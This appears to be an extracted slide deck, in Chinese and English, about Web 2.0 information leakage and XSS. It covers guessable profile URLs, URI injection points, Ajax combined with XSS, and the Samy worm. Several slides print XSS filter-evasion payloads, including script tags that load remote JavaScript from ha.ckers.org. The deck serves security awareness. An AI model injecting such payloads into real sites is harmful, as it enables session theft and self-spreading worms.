INFORMATION LEAKING 2 0 About Me User Experience
INFORMATION LEAKING 2. 0
About Me • • • 職業:網路 程師 副業:部落客 專長: • User Experience Research • Website QA/QC
? INFORMATION LEAKING 2. 0
? Web 2. 0
Two things for sure. . .
• SNS Social Network Service • UGC User Generate Content
More Than That. . .
你不應該這樣設計 • http: //xxx. com/pages/profile/? us erid=1234 • http: //xxx. com/user/show/5678 壞人很省事 : )
慣例優於配置 • Active. Record • id -> primary key • Scaffold • every funtions -> /show/id/ • Books / Guides • 人人都是新手,新手只懂照著書寫
• • • Tw*t**r. com F*****ds. *oo*o. com My. S**ce. com Mini**orld C*world more. .
只要你會寫. . . • for 迴圈 • HTML parser • XML parser • JSON parser
SQL Injection
XSS
More. . .
主流 Script • • • HTML Java. Script VBScript Active. X Flash (最難抵擋)
Also Possible. . .
Code Example (2) http: //HOST/PATH/[XSS] • GET / POST / Cookie (GPC) • • 須特別過濾才能使用 Web 2. 0 時代新興產物︰Tag (多數使用 POST / GET 傳遞) Parsing URI ( Pathname / Filename)-> Tag Developer 忽略這是一個可能遭受篡改的外部 Data 惡意攻擊者可製作包含特殊語法的 URI 做 Attack
Examples. . • http: //HOST/[XSS]/FILENAME. • • • php http: //HOST/PATH/[XSS]/php http: //HOST/PATH/FILENAME. php? [XSS]=VALUE http: //HOST/PATH/FILENAME. php? PARAMETER=[XSS]
• google: // XSS 測試語句大全 • google: // XSS Cheet Sheet
• Image XSS using the JS directive • <IMG SRC=”javascirpt: alert(‘XSS’); ”> • No Closing Scripts tags. • <SCRIPT> SRC=http: //ha. ckers. org/xss. js> </SCRIPT> • Double open angel brackets • <iframe src=http: //ha. ckers. org/scriptlet. html < • BODY Tags • <BODY ONLOAD=alert(‘XSS’)>
• 允許 <SCRIPT> 但不允許 <SCRIPT SRC> • <SCRIPT a=”>” SRC=”http: //ha. ckers. org/xss. js” </SCRIPT> • 難以防禦的. . . • <SCRIPT> document. write(“SCRI”); </SCRIPT>PT SRC=”http: //ha. ckers. org/xss. js”></SC RIPT>
Ajax • • Asychronous Java. Script And XML
Advantage of Ajax • Javascript running on the client reduces • • bandwith and procecssing demands on the server Well-designed code that is truly asynchronous also gives the server more time to respond. Which is smoother, faster, and preferably intuitive as any desktop applcation
Advantage of Ajax + XSS • Javascript running on the client reduces • • bandwith and procecssing demands on the server Well-designed code that is truly asynchronous also gives the server more time to respond. Which is smoother, faster, and preferably intuitive as any desktop applcation
Ajax+XSS is
Samy Worm
難以防禦的原因 -- 其四 • 我們只能依賴 • • • IDS / IPS Vulnerability scanner Source Code analyzer • 但是都很貴
- Slides: 76